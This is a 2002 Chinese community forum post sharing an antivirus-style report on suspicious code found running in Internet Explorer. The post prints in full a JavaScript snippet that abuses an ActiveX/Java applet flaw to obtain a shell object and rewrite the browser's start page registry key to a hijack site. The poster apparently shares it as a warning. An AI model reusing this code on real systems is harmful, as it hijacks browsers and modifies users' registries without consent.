《野猪乐园》显示文章详细内容: [展开] [回复] [网址] [举报] [屏蔽]
大前门
大前门目前处于离线状态
等    级:资深长老
经 验 值:13551
魅 力 值:5319
龙    币:19532
积    分:13939.5
注册日期:2000-09-01
 
  查看大前门个人资料   给大前门发悄悄话   将大前门加入好友   搜索大前门所有发表过的文章   给大前门发送电子邮件      

见内:
当前正在执行的程序的名称和打开的文件的名称是:
"C:\Program Files\Internet Explorer\iexplore.exe"
*********************************************************************************************
可疑代码的动作如下:
有写注册表的动作
有利用IE漏洞的动作
有创建文件对象的动作
有创建 SHELL 对象的动作

*********************************************************************************************
可疑代码显示如下:

document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");function yuzi(){try{a1=document.applets[0];a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");a1.createInstance();Shl = a1.GetObject();a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");try{
Shl.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page","http://liushui88.myrice.com/myhome.htm");}catch(e){}}catch(e){}}setTimeout("yuzi()",1000);

--
当我赞同你的时候,不要把我当成朋友;
当我反对你的时候,不要把我当成敌人。
2002-09-05 22:25:01   此文章已经被查看112次   
 相关文章: [回复]  [顶端] 



  您必须登录论坛才可以发表文章:
 
用户名:   密码:   记住密码:    (忘记密码 注册




版权所有 回龙观社区网 经营许可证编号:京B2-20201639 昌公网安备1101140035号

举报电话:010-86468600-5 举报邮箱: